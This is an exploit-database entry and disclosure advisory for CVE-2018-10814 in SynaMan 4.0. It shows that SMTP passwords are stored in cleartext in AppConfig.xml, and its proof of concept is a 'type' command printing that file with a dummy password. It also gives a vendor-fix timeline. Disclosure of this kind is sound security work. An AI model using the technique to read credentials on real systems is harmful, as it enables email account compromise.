[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SynaMan 4.0 build 1488 - SMTP Credential Disclosure Vulnerability

Author
bzyo
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31089
Category
web applications
Date add
16-09-2018
CVE
CVE-2018-10814
Platform
windows
# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
# Version: 4.0 build 1488
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Tested On: Windows 7 x86
   
Description
-----------------------------------------------------------------
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
 
Prerequisites
-----------------------------------------------------------------
Access to a system running Synaman 4 using a low-privileged user account
  
Proof of Concept
-----------------------------------------------------------------
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file.  This file can be viewed by any local user of the system.
 
C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
        <parameters>
                <parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
                <parameter name="adminEmail" type="1" value="test@gmail.com"></parameter>
                <parameter name="smtpSecurity" type="1" value="None"></parameter>
                **truncated**
                <parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
                <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
                <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
        </parameters>
</Configuration>
 
 
  
Timeline
---------------------------------------------------------------------
05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix 
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure

#  0day.today [2024-12-25]  #